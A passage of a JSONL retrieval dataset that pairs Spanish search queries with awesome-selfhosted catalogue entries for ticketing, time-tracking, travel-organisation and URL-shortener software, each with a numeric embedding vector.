0.02001, 0.0276, 0.03057, -0.0279, -0.04326, -0.00557, -0.01598, -0.0056, 0.04038, -0.01359, 0.10487, -0.00057, 0.06943, 0.05841, -0.01441, 0.02119, -0.04639, 0.02551, -0.01762, -0.00929, -0.03678, -0.06426, -0.01519, -0.02849, -0.02661, -0.07239, -0.0182, 0.03189, -0.03074, -0.02244, 0.03064, 0.07101, 0.03041, -0.0033, -0.06844, -0.07936, -0.03082, 0.01057, -0.02278, -0.09302, -0.04512, 0.00304, 0.00548, -0.0501, 0.00927, -0.05026]} +{"tipo": "pregunta", "herramienta": "Ticketing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Ticketing", "tema": "ticketing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Ticketing: OTOBO β€” Flexible web-based ticketing system used for customer service, help desk, IT service management [GPL-3.0, Perl/Docker]. Request Tracker β€” Enterprise-grade issue tracking system [GPL-2.0, Perl]. Roundup Issue Tracker β€” Simple-to-use and -install issue tracking system with command-line, web, REST, XML-RPC, and e-mail interfaces. Designed with flexibility in mind - not just another bug tracker [MIT/ZPL-2.0, Python/Docker]. Zammad β€” Easy to use but powerful open-source support and ticketing system [AGPL-3.0, Ruby/deb].", "indexar": "cual es una alternativa libre a los sistemas de ticketing corporativos?", "v": [0.07034, 0.01283, -0.02566, -0.06972, 0.00967, -0.14165, -0.00126, -0.05471, -0.13629, -0.0213, -0.10715, -0.11307, 0.01122, 0.07422, 0.11345, -0.02999, 0.10074, -0.18713, 0.14784, -0.04685, -0.0355, -0.0085, -0.06003, -0.01103, 0.01993, -0.05396, 0.06575, -0.03731, -0.11475, 0.02132, 0.01318, -0.05554, 0.13036, -0.0729, -0.03923, 0.03544, 0.05717, 0.1176, 0.07536, -0.06687, 0.07696, -0.06663, -0.05554, 0.08853, 0.11037, -0.10509, -0.11682, 0.03688, 0.01151, -0.05337, -0.13485, -0.00566, -0.0596, 0.01146, 0.13867, -0.05341, 0.07658, -0.11219, -0.02414, -0.04275, -0.06631, -0.0003, 0.02045, -0.03885, 0.00056, 0.10191, 0.02571, -0.06695, -0.02084, -0.03076, -0.00019, -0.08185, 0.04579, 0.04214, 0.026, 0.10319, 0.02869, -0.01186, -0.03143, 0.04014, 0.03724, -0.02287, -0.00438, 0.11609, 0.0094, -0.1219, 0.03329, 0.00681, -0.026, 0.11591, 0.08803, -0.00721, 0.04152, 0.08564, -0.01342, -0.06934, -0.01265, 0.02807, -0.09364, 0.09763, -0.04373, 0.02885, -0.11437, -0.04003, -0.11117, 0.02225, -0.00989, 0.00765, 0.01717, 0.03928, -0.02183, 0.04499, 0.03263, 0.01986, 0.00014, -0.08566, 0.0804, 0.02561, 0.02968, 0.03836, -0.03317, -0.01664, 0.04646, -0.11575, 0.04778, 0.00603, 0.06341, 0.06746, -0.01522, 0.01043, 0.05747, -0.00401, -0.13667, 0.03758, -0.1301, -0.08109, 0.05376, 0.00424, 0.11085, 0.00949, -0.01616, 0.06604, 0.05629, 0.01127, 0.11775, -0.00407, 0.01896, -0.09472, -0.0279, 0.00428, -0.12164, 0.03725, -0.11001, 0.10604, -0.03444, 0.05554, -0.01837, -0.06259, -0.08485, 0.06145, 0.00558, -0.03158, -0.03358, 0.11638, -0.0108, -0.03893, -0.03315, -0.05465, -0.00099, 0.09794, 0.03538, 0.07019, 0.07404, -0.06945, 0.06014, -0.07968, -0.05766, -0.08812, 0.07085, -0.02575, -0.03719, -0.03114, -0.03556, -0.04136, -0.00336, -0.00476, 0.00938, -0.03136, 0.05691, 0.03447, 0.00728, 0.05365, -0.07169, -0.09293, -0.04613, -0.01177, -0.04242, -0.08845, -0.03661, -0.01365, -0.10657, 0.03075, 0.00451, -0.03801, 0.02538, 0.02586, 0.03969, 0.03151, 0.07944, 0.08543, 0.03662, 0.02694, 0.04941, -0.03112, -0.08762, -0.02773, 0.05194, -0.01897, -0.00217, -0.01142, 0.08059, -0.004, 0.0508, 0.01576, 0.00993, -0.06308, 0.01079, 0.0667, -0.03513, -0.02996, 0.03628, -0.00425, 0.07352, 0.03967, -0.00943, -0.0069, 0.02308, -0.01779, -0.04791, -0.03964, 0.06976, 0.12582, -0.0377, -0.02193, -0.0617, -0.01304, -0.11763, -0.05617, -0.02219, -0.06211, -0.06205, 0.0526, 0.02016, 0.01197, 0.02102, -0.03825]} +{"tipo": "pregunta", "herramienta": "Time Tracking", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Time Tracking", "tema": "time tracking", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Time Tracking: ActivityWatch β€” Automatically track how you spend time on your devices [MPL-2.0, Python]. Beaver Habit Tracker β€” Habit tracking app to save your precious moments in your fleeting life [BSD-3-Clause, Docker]. Ever Gauzy β€” Open business management platform for collaborative, on-demand and sharing economies (ERP/CRM/HRM/ATS/PM) [AGPL-3.0, Docker/Nodejs]. Kimai β€” Track work time and print out a summary of your activities on demand [AGPL-3.0, PHP]. solidtime β€” Modern time tracking application for freelancers and agencies [AGPL-3.0, Docker]. TimeTagger β€” An open source time-tracker based on an interactive timeline and powerful reporting [GPL-3.0, Python]. Traggo β€” Traggo is a tag-based time tracking tool. In Traggo there are no tasks, only tagged time spans [GPL-3.0, Docker/Go]. Wakapi β€” Tracking tool for coding statistics, compatible with WakaTime [GPL-3.0, Go/Docker]. Ziit β€” The Swiss army knife of code time tracking (alternative to WakaTime) [AGPL-3.0, Docker].", "indexar": "quΓ© programa me sirve para medir automΓ‘ticamente cuΓ‘nto tiempo dedico a cada aplicaciΓ³n", "v": [0.07178, 0.19985, -0.13408, -0.02873, 0.12318, 0.01092, -0.06718, -0.09043, -0.21377, -0.04683, -0.05061, -0.08427, -0.00695, -0.21158, 0.03838, 0.00526, 0.11388, -0.12114, 0.06619, 0.03257, 0.11533, -0.04091, -0.07574, -0.08073, -0.03291, 0.02133, 0.06477, -0.04196, -0.14902, -0.01062, 0.01747, 0.06856, 0.04827, -0.1142, -0.03805, -0.09135, 0.0663, 0.08257, -0.09901, 0.03598, 0.03328, -0.00022, -0.00819, -0.00083, 0.08285, 0.02851, 0.06098, 0.05505, -0.10374, -0.03952, -0.06241, -0.00686, 0.09321, 0.05046, -0.05236, 0.04969, 0.05891, -0.03915, -0.01232, -0.03668, -0.03924, 0.00888, 0.02426, 0.01002, 0.09977, -0.09548, 0.02574, 0.01712, -0.09205, 0.00024, -0.07935, 0.05132, -0.01915, -0.01992, 0.02787, 0.08826, -0.03565, -0.01998, 0.01549, -0.15281, -0.08207, -0.03683, -0.02918, 0.02016, -0.04705, 0.04227, 0.16104, -0.01525, 0.04762, -0.01968, -0.0556, -0.00124, -0.00559, 0.09684, -0.03959, -0.07831, 0.11951, 0.04889, 0.07694, 0.14038, 0.09796, -0.11878, -0.04816, 0.01845, -0.0109, 0.0862, 0.00041, -0.02438, -0.07581, -0.03788, 0.08943, -0.00398, -0.07583, -0.02334, -0.06703, 0.00899, 0.0152, -0.04384, 0.04742, -0.06075, -0.12373, 0.03246, -0.01512, -0.00605, 0.08757, -0.06454, -0.07482, 0.09055, -0.00234, 0.07776, -0.0119, 0.03358, -0.06342, 0.01818, -0.04828, -0.03772, 0.03637, -0.01141, 0.00762, -0.01232, 0.03955, 0.04255, -0.01359, -0.00967, 0.05187, -0.01417, -4e-05, -0.07575, -0.04372, 0.0068, 0.0301, -0.06706, -0.01687, 0.08588, -0.10013, 0.00221, -0.0025, -0.06052, -0.04077, 0.00378, -0.04245, -0.01253, -0.024, -0.03973, 0.02831, -0.07536, 0.02975, -0.01783, 0.07627, 0.09209, -0.02604, 0.05468, 0.021, -0.12122, 0.00166, -0.05844, -0.01854, -0.08972, 0.01608, -0.0245, -0.08752, 0.04874, 0.05974, 0.00399, -0.01983, -0.02878, -0.01057, 0.01595, 0.0732, 0.06026, -0.02209, -0.02334, -0.01308, -0.01413, -0.00637, -0.04684, 0.00193, -0.02879, 0.00381, -0.02882, -0.05989, -0.03205, 0.02458, 0.02048, 0.04825, 0.15543, -0.01112, 0.07209, 0.00316, 0.10888, 0.03593, -0.00827, 0.06929, 0.04795, -0.00243, -0.0055, 0.07286, -0.01355, 0.02763, 0.01788, -0.01513, -0.04462, 0.04365, -3e-05, -0.02604, -0.01051, 0.09684, 0.06643, 0.07255, 0.01823, -0.08927, -0.02554, -0.04701, -0.05464, 0.09097, -0.02086, 0.01447, -0.08114, -0.04717, -0.07322, -0.01166, 0.11948, 0.00816, -0.03951, -0.04797, -0.04253, -0.06219, 0.00634, -0.03979, -0.03913, -0.06368, 0.0469, 0.0528, -0.03359, 0.08024, -0.0263]} +{"tipo": "pregunta", "herramienta": "Time Tracking", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Time Tracking", "tema": "time tracking", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Time Tracking: ActivityWatch β€” Automatically track how you spend time on your devices [MPL-2.0, Python]. Beaver Habit Tracker β€” Habit tracking app to save your precious moments in your fleeting life [BSD-3-Clause, Docker]. Ever Gauzy β€” Open business management platform for collaborative, on-demand and sharing economies (ERP/CRM/HRM/ATS/PM) [AGPL-3.0, Docker/Nodejs]. Kimai β€” Track work time and print out a summary of your activities on demand [AGPL-3.0, PHP]. solidtime β€” Modern time tracking application for freelancers and agencies [AGPL-3.0, Docker]. TimeTagger β€” An open source time-tracker based on an interactive timeline and powerful reporting [GPL-3.0, Python]. Traggo β€” Traggo is a tag-based time tracking tool. In Traggo there are no tasks, only tagged time spans [GPL-3.0, Docker/Go]. Wakapi β€” Tracking tool for coding statistics, compatible with WakaTime [GPL-3.0, Go/Docker]. Ziit β€” The Swiss army knife of code time tracking (alternative to WakaTime) [AGPL-3.0, Docker].", "indexar": "con quΓ© puedo montar un sistema de seguimiento de actividades sin pagar licencias comerciales", "v": [0.09782, 0.11057, -0.14351, -0.1737, -0.08209, -0.14734, -0.02667, 0.03871, -0.25333, -0.10581, -0.00642, -0.09948, 0.13333, -0.07433, 0.1521, 0.07756, -0.00679, -0.15257, 0.06306, 0.01155, -0.00885, -0.03932, -0.02476, -0.02278, 0.02034, 0.06847, 0.05599, -0.22779, -0.16649, 0.14728, 0.00557, 0.07603, 0.10774, -0.0385, 0.03523, -0.03523, 0.03039, 0.03449, 0.1472, -0.10204, 0.06049, -0.03412, -0.01367, -0.09508, 0.02094, -0.05588, -0.00634, -0.03501, -0.04659, -0.08906, 0.04765, 0.04115, -0.11533, -0.11901, 0.10879, -0.04912, -0.00638, 0.00191, 0.04594, -0.09191, 0.04812, 0.09215, 0.03446, 0.02119, 0.05851, 0.01991, 0.11543, -0.01601, 0.0564, 0.01115, 0.00414, -0.05351, -0.0053, 0.07085, -0.04575, 0.0074, 0.03584, -0.06607, -0.0018, 0.09643, 0.0564, 0.01038, -0.05491, 0.0903, 0.03017, -0.0209, -0.03346, -0.03394, 0.04933, 0.01328, 0.04614, 0.12419, -0.02766, 0.05282, 0.06372, -0.04432, 0.00835, 0.08588, -0.06724, 0.11132, -0.07824, 0.09644, -0.05903, -0.00352, -0.00732, 0.00811, 0.0574, -0.05817, 0.01216, -0.0083, -0.02116, 0.04099, -0.12856, -0.01308, -0.06772, 0.0275, -0.05489, 0.00843, 0.00889, 0.08525, -0.05821, 0.06678, 0.04479, -0.01641, 0.0963, -0.02054, 0.0317, 0.22077, -0.07697, -0.02089, 0.03054, -0.02899, 0.02043, -0.01504, 0.02709, 0.03498, -0.04127, 0.02318, -0.07702, 0.02765, 0.04134, -0.01094, 0.01262, 0.03678, 0.07278, 0.044, -0.00994, -0.09366, -0.03584, -0.03997, 0.02133, 0.04381, -0.0, 0.00839, -0.01028, -0.01441, 0.03413, -0.02529, 0.06372, 0.03187, 0.08711, 0.11626, -0.05328, -0.02456, 0.00531, 0.02453, -0.05617, -0.02542, 0.05013, 0.04493, -0.05187, -0.01196, 0.05774, -0.05576, 0.11382, -0.00375, -0.05941, -0.0578, 0.06776, -0.01902, -0.08311, 0.05147, -0.00812, -0.00155, -0.02225, 0.03133, -0.03771, 0.03494, 0.03963, 0.04769, -0.0076, 0.02881, -0.01066, -0.03379, 0.00187, -0.02616, -0.0212, 0.02401, -0.04502, -0.01681, -0.01837, 0.01823, -0.00179, -0.01183, 0.02899, -0.02492, 0.01995, 0.11892, 0.07293, 0.03851, -0.04172, -0.00769, 0.02675, -0.03431, -0.07591, 0.04021, -0.04024, -0.02389, -0.02476, -0.00557, 0.07436, 0.00905, 0.03262, 0.0185, -0.00799, -0.02538, 0.01529, 0.06804, 0.034, -0.007, -0.0408, 0.03038, -0.03432, 0.00745, 0.01213, -0.00847, -0.00935, 0.0142, 0.01958, 0.00035, 0.05046, 0.06019, 0.02767, -0.04062, -0.01782, -0.02248, -0.03981, -0.01139, -0.00614, -0.05707, -0.01841, 0.05366, -0.00221, 0.00965, 0.03209, -0.01594]} +{"tipo": "pregunta", "herramienta": "Time Tracking", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Time Tracking", "tema": "time tracking", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Time Tracking: ActivityWatch β€” Automatically track how you spend time on your devices [MPL-2.0, Python]. Beaver Habit Tracker β€” Habit tracking app to save your precious moments in your fleeting life [BSD-3-Clause, Docker]. Ever Gauzy β€” Open business management platform for collaborative, on-demand and sharing economies (ERP/CRM/HRM/ATS/PM) [AGPL-3.0, Docker/Nodejs]. Kimai β€” Track work time and print out a summary of your activities on demand [AGPL-3.0, PHP]. solidtime β€” Modern time tracking application for freelancers and agencies [AGPL-3.0, Docker]. TimeTagger β€” An open source time-tracker based on an interactive timeline and powerful reporting [GPL-3.0, Python]. Traggo β€” Traggo is a tag-based time tracking tool. In Traggo there are no tasks, only tagged time spans [GPL-3.0, Docker/Go]. Wakapi β€” Tracking tool for coding statistics, compatible with WakaTime [GPL-3.0, Go/Docker]. Ziit β€” The Swiss army knife of code time tracking (alternative to WakaTime) [AGPL-3.0, Docker].", "indexar": "cuΓ‘l es una alternativa gratuita y libre a WakaTime", "v": [-0.13831, 0.14391, 0.00506, 0.09678, -0.05926, 0.03324, -0.0048, -0.07875, -0.0377, -0.1053, -0.03838, -0.22502, 0.00644, 0.09895, 0.03256, 0.03454, 0.09338, -0.05003, 0.14911, -0.00754, 0.00602, -0.0163, -0.09059, -0.01112, -0.04392, -0.15084, 0.01556, -0.00984, -0.07006, 0.02164, 0.05237, -0.00795, 0.09408, -0.06927, 0.05235, 0.07114, 0.19048, 0.06651, 0.16719, -0.12283, 0.06711, -0.0107, -0.0144, 0.03222, 0.01035, -0.01031, -0.01643, 0.04939, -0.00912, 0.03757, -0.0714, -0.02938, 0.0052, 0.05852, 0.07351, -0.03886, 0.17549, -0.10245, -0.12231, 0.00084, -0.04303, 0.12338, 0.03336, -0.02787, 0.09449, -0.08124, -0.04541, 0.02041, -0.0734, 0.04271, 0.04925, -0.05709, 0.09837, -0.02202, -0.10129, 0.01508, -0.1303, -0.01609, -0.01929, 0.0472, 0.05022, -0.04918, 0.07497, -0.01496, -0.05054, -0.00734, 0.11717, -0.10639, 0.00307, 0.03432, 0.04876, 0.04616, 0.05026, 0.13248, -0.02851, -0.11727, 0.01284, 0.04216, 0.05061, 0.10731, 0.04727, 0.00455, -0.07048, -0.06692, 0.01425, 0.03817, -0.04863, 0.04859, -0.09264, 0.01046, -0.01515, 0.04624, -0.00232, 0.01961, 0.03378, -0.02609, -0.02775, 0.032, -0.03084, 0.01816, 0.00484, 0.00502, -0.08314, -0.09297, 0.02903, 0.10675, 0.03756, 0.02072, -0.03366, 0.05693, 0.04075, -0.01975, -0.08881, -0.11068, -0.11726, -0.08, 0.04094, -0.0119, 0.05626, -0.01602, -0.00902, -0.03064, 0.03846, -0.02776, 0.03637, -0.06699, 0.02776, -0.06173, -0.02313, -0.06274, -0.09201, 0.0183, -0.02418, 0.10428, -0.03246, -0.00546, -0.02268, -0.0107, -0.05555, 0.08925, 0.03358, -0.0557, -0.06165, -0.01411, 0.02345, -0.07308, 0.00647, -0.01232, -0.04159, 0.0146, 0.05123, 0.09752, 0.0353, -0.12311, 0.02091, -0.06237, 0.02706, -0.10906, 0.0147, -0.09042, 0.02592, 0.03832, -0.06338, -0.05037, -0.06469, -0.07859, -0.0159, 0.04718, 0.02024, 0.10335, -0.00419, -0.00638, -0.05031, -0.01789, -0.04312, -0.02415, 0.00877, -0.08189, -0.02324, 0.01591, -0.076, -0.05105, 0.00388, -0.00642, -0.0012, -0.01073, 0.02192, 0.11039, -0.04316, 0.0768, 0.00627, 0.06207, 0.08091, -0.04598, -0.03254, 0.0561, 0.05367, -0.05967, -0.01278, -0.00641, 0.0493, 0.06341, 0.03572, -0.00129, -0.03991, 0.04373, 0.06142, 0.10194, 0.00338, 0.03302, 0.01444, 0.03639, -0.00552, -0.00132, 0.06422, -0.01113, 0.03177, 0.01584, 0.01994, -0.01464, 0.07912, 0.0889, -0.01575, 0.01824, -0.09451, -0.06372, -0.05116, -0.02582, -0.01614, -0.07335, -0.0649, 0.05214, 0.03414, 0.00068, -0.00817, -0.01881]} +{"tipo": "pregunta", "herramienta": "Travel Organization", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Travel Organization", "tema": "travel organization", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Travel Organization: Surmai β€” Collaborative personal and family travel organizer [MIT, Docker].", "indexar": "que programa hay para organizar viajes familiares en casa?", "v": [0.06455, 0.13409, -0.04546, -0.10163, -0.02797, -0.04454, 0.07474, -0.03003, -0.0098, -0.13891, -0.04839, -0.07197, 0.05216, -0.06387, 0.05066, -0.01302, 0.15636, 0.05066, 0.07538, 0.04017, -0.08547, 0.13675, 0.01397, 0.08039, -0.10713, -0.06108, 0.16028, -0.04181, -0.07728, 0.00516, 0.04569, -0.00216, 0.05914, -0.084, 0.06772, 0.01205, 0.01581, 0.01046, -0.06382, -0.10996, -0.01472, 0.01339, -0.02821, 0.07182, -0.02172, -0.04126, -0.0106, 0.00218, -0.06379, -0.1343, -0.06338, -0.05004, 0.07991, 0.06367, 0.06726, -0.08018, -0.08957, -0.12942, 0.01443, 0.08692, -0.00746, 0.02912, 0.08431, 0.15009, 0.04362, 0.0646, 0.06168, 0.01063, 0.0369, -0.07033, -0.10656, -0.00214, 0.02201, 0.03271, -0.0575, 0.00864, 0.06408, -0.02455, 0.04964, -0.00042, 0.08278, 0.00954, -0.04405, 0.08399, 0.02329, -0.0876, 0.01826, 0.00045, 0.05929, -0.04169, 0.02038, -0.01396, 0.07366, 0.07892, -0.00816, -0.04724, 0.22694, 0.02568, 0.10446, 0.09087, 0.02925, -0.1545, 0.01857, 0.12658, -0.1169, 0.0364, 0.09386, 0.07406, -0.05718, 0.04715, -0.05052, 0.08608, -0.00431, 0.00247, -0.06442, -0.02515, 0.03579, -0.07696, 0.05883, -0.07393, -0.09524, 0.04864, 0.02791, 0.03929, 0.00468, -0.06328, 0.02305, 0.07206, -0.00304, 0.05782, -0.00302, -0.02036, -0.03282, 0.02335, -0.03363, -0.01983, -0.06861, -0.02605, 0.0792, -0.09654, 0.03547, 0.07553, -0.03346, -0.07567, 0.03318, 0.03346, -0.0409, 0.06086, -0.07488, 0.13396, -0.02551, 0.039, -0.01888, 0.0339, 0.0515, 0.03394, -0.0639, -0.04651, -0.0441, -0.01016, -0.05817, 0.03043, 0.00301, -0.0743, 0.04065, 0.01406, 0.06914, 0.03221, -0.01944, 0.0419, -0.10061, 0.06105, 0.00906, -0.06509, -0.01992, -0.0312, 0.01645, -0.04075, -0.01896, -0.04796, -0.05629, 0.06027, -0.02845, -0.00087, -0.04704, 0.04037, 0.01664, 0.0992, 0.0315, -0.08582, -0.09029, -0.02624, -0.01105, 0.02286, -0.01595, -0.06698, -0.09527, -0.04068, 0.11783, -0.00206, -0.02618, -0.08599, 0.09028, -0.01706, 0.01796, 0.1012, -0.02041, 0.00817, 0.05332, 0.16175, 0.00169, -0.05092, 0.0185, 0.05691, -0.0668, 0.07111, -0.04638, 0.01176, 0.12361, 0.10327, 0.06579, 0.07417, -0.06357, -0.03222, 0.02848, -0.06364, 0.01636, -0.02575, 0.07318, -0.02629, 0.02933, -0.06315, 0.07611, 0.01413, 0.00057, 0.00313, -0.00752, -0.03973, 0.03437, 0.00121, -0.00655, 0.00891, 0.00877, 0.0239, -0.05895, -0.04176, -0.01507, 0.07774, 0.06471, -0.00773, 0.00937, 0.02387, 0.03333, -0.04515, -0.00922, 0.01769]} +{"tipo": "pregunta", "herramienta": "Travel Organization", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Travel Organization", "tema": "travel organization", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Travel Organization: Surmai β€” Collaborative personal and family travel organizer [MIT, Docker].", "indexar": "cual es una alternativa libre a las agencias de viajes para planificar un viaje con la familia?", "v": [0.12798, 0.07021, -0.0419, 0.02124, -0.0159, 0.02146, 0.0459, -0.0718, -0.04965, -0.1368, -0.00691, -0.16519, -0.0307, 0.0653, 0.09801, -0.01386, 0.10774, 0.08016, 0.1558, 0.02976, -0.04737, 0.04688, -0.03206, -0.02455, -0.11544, -0.06642, 0.14822, -0.0292, -0.1206, 0.0386, 0.01612, 0.04648, 0.10642, -0.05492, 0.09384, 0.00506, 0.09125, 0.13037, 0.00791, -0.11251, 0.01651, -0.05904, -0.06845, 0.11482, -0.09893, -0.05068, -0.14072, 0.01415, -0.03365, -0.03222, -0.0576, -0.03722, -0.05122, 0.1292, 0.12052, 0.06581, 0.08378, -0.10351, -0.03188, 0.09083, -0.03796, 0.05698, 0.02219, 0.11399, 0.11435, 0.04414, 0.00973, -0.05429, 0.00545, -0.05616, -0.03376, 0.01274, 0.08632, 0.01501, -0.07055, 0.01195, 0.13723, -0.01246, 0.04743, 0.03254, 0.16469, 0.00133, -0.08446, 0.05375, -0.01553, -0.11318, 0.11294, -0.00872, 0.03613, 0.0561, 0.00925, -0.00253, 0.00744, 0.03729, -0.07473, -0.01531, 0.08447, -0.02411, 0.10653, 0.10217, 0.06121, -0.08883, -0.03146, 0.12933, -0.09582, 0.0556, 0.0619, 0.04283, -0.07945, 0.0648, -0.02593, 0.0603, 0.04282, 0.00351, -0.02962, -0.01706, 0.00919, -0.01791, 0.02293, -0.06273, -0.07846, 0.03493, 0.00288, -0.00259, 0.02416, 0.00669, -0.04406, 0.02656, -0.0035, 0.01285, 0.05527, 0.02923, -0.05283, -0.06476, -0.03514, -0.02202, -0.00808, 0.0295, 0.08764, -0.02519, 0.00853, -0.0178, -0.01074, -0.04088, 0.04488, 0.05152, -0.04013, -0.00164, -0.05197, 0.06481, -0.08917, 0.04651, 0.04546, 0.09416, 0.05471, 0.09931, -0.07966, -0.08198, -0.05426, 0.11741, 0.03859, 0.00171, 0.0327, 0.05415, 0.08237, -0.04268, -0.01667, -0.0848, -0.01893, -0.0125, -0.05311, 0.01767, 0.09869, -0.11614, 0.0675, -0.03263, -0.01429, -0.04038, -0.02421, -0.02746, -0.05927, 0.03558, -0.10696, 0.01048, -0.04731, 0.03472, -0.00754, 0.02352, 0.06868, -0.01294, -0.06516, 0.01988, -0.00262, 0.02868, -0.01123, -0.07256, -0.01522, -0.06948, 0.04083, 0.01549, -0.00774, -0.07392, 0.04695, -0.05864, 0.0051, 0.06679, 0.00353, 0.07389, -0.00627, 0.13885, 0.04715, -0.03727, 0.06943, -0.0131, -0.06396, 0.05913, -0.01539, -0.03461, 0.04552, 0.11141, 0.06938, 0.10484, -0.02653, -0.03008, 0.0293, -0.00192, 0.03979, -0.01888, 0.01939, -0.04161, 0.04687, 0.01945, 0.01621, 0.008, -0.0112, 0.06809, 0.0269, -0.01998, -0.00567, 0.00401, 0.06779, 0.0031, -0.03476, -0.00102, -0.0294, -0.05025, -0.07422, 0.05086, 0.04882, -0.08471, -0.013, 0.08058, 0.06728, -0.01871, 0.03891, -0.05988]} +{"tipo": "pregunta", "herramienta": "URL Shorteners", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / URL Shorteners", "tema": "url shorteners", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / URL Shorteners: bit β€” Fast, lightweight, resource-efficient, compiled URL shortener [MIT, Docker/Crystal]. Chhoto URL β€” Simple, lightning-fast URL shortener with no bloat (fork of simply-shorten) [MIT, Rust/Docker]. clink β€” A super-minimal link shortening service written in pure C, focusing on small executable size, portability, and ease of configuration [AGPL-3.0, C]. Flink β€” Create QR Codes, embeddable link previews for your website and crawls/scrapes metadata [MIT, Docker]. Kutt β€” Modern URL shortener with support for custom domains and custom URLs [MIT, Nodejs/Docker]. rs-short β€” Lightweight link shortener written in Rust, with features such as caching, spambot protection and phishing detection [MPL-2.0, Rust]. Shlink β€” URL shortener with REST API and command line interface. Includes official progressive web application and docker images [MIT, PHP/Docker]. Simple-URL-Shortener β€” KISS URL shortener, public or private (with account). Minimalist and lightweight. No dependencies [MIT, PHP].", "indexar": "que programa hay para acortar URLs de forma ligera y eficiente?", "v": [0.03372, -0.13277, -0.1673, -0.04832, 0.20107, -0.10746, 0.00805, 0.0768, -0.10487, -0.06663, -0.05944, -0.11854, 0.10255, -0.12205, 0.10921, -0.04721, -0.05553, -0.16357, -0.04882, -0.06218, -8e-05, 0.11002, -0.07005, -0.07815, -0.08307, 0.0289, 0.11411, -0.10828, -0.02858, 0.08384, -0.00464, 0.18163, 0.0565, -0.01083, -0.04056, 0.10718, 0.00543, 0.01949, 0.01875, 0.07272, -0.02035, 0.04647, 0.07899, 0.00585, 0.06139, 0.01798, 0.01137, 0.04333, 0.11504, 0.01411, -0.06241, 0.05705, 0.04707, 0.03837, -0.01426, -0.06964, -0.18859, -0.08056, -0.03783, -0.04437, -0.00581, -0.04915, -0.04906, -0.03387, 0.02929, 0.12081, 0.0611, -0.10635, -0.10669, -0.04181, 0.0361, 0.05526, 0.05682, -0.0143, -0.03277, 0.09227, -0.09942, 0.04202, 0.03183, -0.02217, 0.05695, -0.06942, -0.02761, 0.13431, -0.04704, 0.00088, 0.06695, -0.05439, -0.00723, -0.05432, -0.03463, -0.00111, 0.04996, 0.10125, -0.0124, -0.1029, 0.02869, 0.12633, 0.0955, 0.09695, 0.003, -0.09896, -0.09182, 0.12244, -0.01772, 0.09371, -0.03618, -0.01686, -0.07479, 0.09421, 0.00369, -0.05493, -0.12282, -0.00668, -0.04034, 0.03679, -0.06748, -0.0152, -0.02881, -0.14972, -0.11088, -0.05155, -0.0729, -2e-05, 0.06223, 0.0096, 0.02882, 0.04525, -0.07056, 0.04908, -0.00645, 0.01831, -0.05384, -0.04184, 0.02057, -0.04235, 0.03737, -0.02954, -0.03033, -0.02775, 0.00176, 0.0109, -0.01892, 0.00444, -0.00963, -0.10747, 0.06098, -0.02858, -0.04188, 0.08739, 0.03832, 0.05731, 0.00645, -0.00978, -0.10967, -0.05704, -0.00891, 0.07251, -0.0593, 0.04171, -0.09274, 0.02489, -0.01658, -0.04075, 0.11267, -0.03433, -0.01762, 0.03867, 0.02581, 0.11657, -0.00869, 0.051, -0.00498, -0.09346, -0.01567, 0.00021, -0.03453, -0.04759, 0.0518, -0.03973, -0.0551, 0.00889, 0.04522, 0.03521, -0.01602, -0.07351, 0.01664, 0.04042, -0.02606, -0.01411, 0.03955, -0.03964, -0.03228, -0.01446, 9e-05, 0.00657, -0.01946, -0.04654, 0.0078, -0.04475, -0.09097, -0.07812, 0.00636, -0.01627, 0.01957, 0.07575, -0.01573, 0.01268, 0.02521, 0.07899, 0.0476, -0.0084, 0.0638, -0.0062, -0.01956, 0.01767, 0.01424, 0.02847, 0.06651, 0.0719, 0.03018, 0.00732, 0.00123, 0.07249, 0.02802, -0.02426, 0.00311, 0.07562, 0.01299, -0.03815, -0.03617, -0.0639, 0.01005, -0.03618, 0.01151, -0.0284, -0.0172, -0.00971, -0.03413, -0.0671, -0.08497, -0.02676, 0.0085, 0.00669, -0.02133, 0.01441, -0.08378, -0.02965, 0.00028, -0.01042, -0.02899, 0.01073, 0.02687, -0.03152, 0.08619, 0.00899]} +{"tipo": "pregunta", "herramienta": "URL Shorteners", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / URL Shorteners", "tema": "url shorteners", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / URL Shorteners: bit β€” Fast, lightweight, resource-efficient, compiled URL shortener [MIT, Docker/Crystal]. Chhoto URL β€” Simple, lightning-fast URL shortener with no bloat (fork of simply-shorten) [MIT, Rust/Docker]. clink β€” A super-minimal link shortening service written in pure C, focusing on small executable size, portability, and ease of configuration [AGPL-3.0, C]. Flink β€” Create QR Codes, embeddable link previews for your website and crawls/scrapes metadata [MIT, Docker]. Kutt β€” Modern URL shortener with support for custom domains and custom URLs [MIT, Nodejs/Docker]. rs-short β€” Lightweight link shortener written in Rust, with features such as caching, spambot protection and phishing detection [MPL-2.0, Rust]. Shlink β€” URL shortener with REST API and command line interface. Includes official progressive web application and docker images [MIT, PHP/Docker]. Simple-URL-Shortener β€” KISS URL shortener, public or private (with account). Minimalist and lightweight. No dependencies [MIT, PHP].", "indexar": "con que puedo montar un servicio de encriptaciΓ³n de enlaces sin dependencias externas?", "v": [0.15251, 0.09565, -0.15201, -0.108, 0.01826, -0.11743, -0.07063, 0.06133, -0.06491, -0.07716, 